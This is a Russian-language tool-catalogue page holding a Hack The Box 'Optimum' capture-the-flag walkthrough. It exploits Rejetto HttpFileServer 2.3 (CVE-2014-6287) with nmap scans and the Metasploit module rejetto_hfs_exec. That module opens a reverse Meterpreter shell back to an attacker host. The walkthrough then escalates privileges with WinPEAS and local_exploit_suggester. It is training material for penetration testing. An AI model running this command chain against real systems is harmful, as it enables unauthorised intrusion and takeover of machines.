Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Optimum — Разбор машины Optimum с Hack The Box. Это прохождение охватывает эксплуатацию Rejetto HttpFileServer 2.3 (CVE-2014-6287) для получения начального доступа, с последующим повышением привилегий на хосте Windows с использованием методов перечисления и инструментов пост-эксплуатации. | Kitploit
Инструменты/GitHubGitHub/r3fr4kt/optimum
Повышение привилегийРазведкаСканеры уязвимостейАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийСбор информацииПост-эксплуатацияТестирование на ПроникновениеОбучение и Образование
GitHubr3fr4kt/optimum
26 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Optimum

Разбор машины Optimum с Hack The Box. Это прохождение охватывает эксплуатацию Rejetto HttpFileServer 2.3 (CVE-2014-6287) для получения начального доступа, с последующим повышением привилегий на хосте Windows с использованием методов перечисления и инструментов пост-эксплуатации.

Репозиторий

Optimum


Optimum – Отчет Hack The Box

Обзор

В этой машине цель состоит в получении первоначального доступа к хосту Windows путем эксплуатации уязвимого веб-сервиса, а затем повышении привилегий для получения флага администратора.

Путь атаки включал:

  • Обнаружение сервисов
  • Эксплуатацию Rejetto HTTP File Server 2.3
  • Первоначальный доступ через Metasploit
  • Повышение привилегий с помощью WinPEAS и модулей пост-эксплуатации Metasploit

Разведка

Начинаем с полного TCP-сканирования портов для выявления открытых сервисов.

root@kitploit:~
nmap -Pn -n -p- --min-rate 5000 -T4 <TARGET_IP>

Сканирование показывает открытый порт 80.

Далее выполняем сканирование сервиса и версии.

root@kitploit:~
nmap -p80 -sSCV --min-rate 5000 -T4 <TARGET_IP>

Результат определяет следующий сервис:

root@kitploit:~
HttpFileServer 2.3

Этот сервис соответствует Rejetto HTTP File Server, легковесному файловому веб-серверу.


Определение уязвимости

После исследования обнаруженной версии находим известную уязвимость:

root@kitploit:~
CVE-2014-6287

Эта уязвимость позволяет удаленное выполнение кода из-за неправильной санитизации входных данных.


Эксплуатация

Для эксплуатации уязвимости используем Metasploit.

Запускаем Metasploit:

root@kitploit:~
msfconsole -q

Ищем подходящий модуль:

root@kitploit:~
search rejetto

Загружаем модуль эксплуатации:

root@kitploit:~
use exploit/windows/http/rejetto_hfs_exec

Настраиваем необходимые параметры:

root@kitploit:~
set RHOSTS <TARGET_IP>
set RPORT <TARGET_PORT>
set LHOST <ATTACKER_IP>
set LPORT <ATTACKER_PORT>
run

После выполнения эксплойт открывает сессию Meterpreter на целевой машине.


Первоначальный доступ

В полученной сессии Meterpreter перемещаемся по файловой системе, чтобы получить флаг пользователя.

root@kitploit:~
cd
cat user.txt
whoami

Вывод команды показывает, что мы вошли как:

root@kitploit:~
kostas

Поскольку этот пользователь не имеет административных привилегий, приступаем к повышению привилегий.


Обнаружение путей повышения привилегий

Для выявления потенциальных векторов повышения привилегий загружаем WinPEAS, известный инструмент для перебора привилегий в Windows.

root@kitploit:~
upload /usr/share/peass/winpeas/winPEAS.exe C:\Users\kostas\Desktop\wp.exe

Затем выполняем его:

root@kitploit:~
shell
.\wp.exe

Вывод раскрывает полезную информацию, включая учётные данные, связанные с пользователем kostas.


Повышение привилегий

После анализа возможных векторов повышения привилегий используем модуль Metasploit:

root@kitploit:~
local_exploit_suggester

Загружаем модуль:

root@kitploit:~
use post/multi/recon/local_exploit_suggester

Настраиваем сессию:

root@kitploit:~
set SESSION <SESSION_NUMBER>
run

Этот модуль предлагает возможные локальные эксплойты для повышения привилегий.

После успешного повышения привилегий получаем оболочку с правами администратора.

Проверка:

root@kitploit:~
shell
whoami

Доступ администратора

Получив административные привилегии, переходим в каталог администратора для получения флага root.

root@kitploit:~
cd \Users\Administrator
dir
cd Desktop
dir
type root.txt

Основные выводы

Эта машина демонстрирует несколько важных концепций пентестинга:

  • Правильное обнаружение сервисов критически важно для выявления уязвимого ПО.
  • Общеизвестные уязвимости, такие как CVE-2014-6287, могут привести к немедленному удаленному выполнению кода.
  • Инструменты, такие как WinPEAS, помогают выявить возможности повышения привилегий в среде Windows.
  • Модули пост-эксплуатации Metasploit могут ускорить процесс повышения привилегий.
Скачать инструмент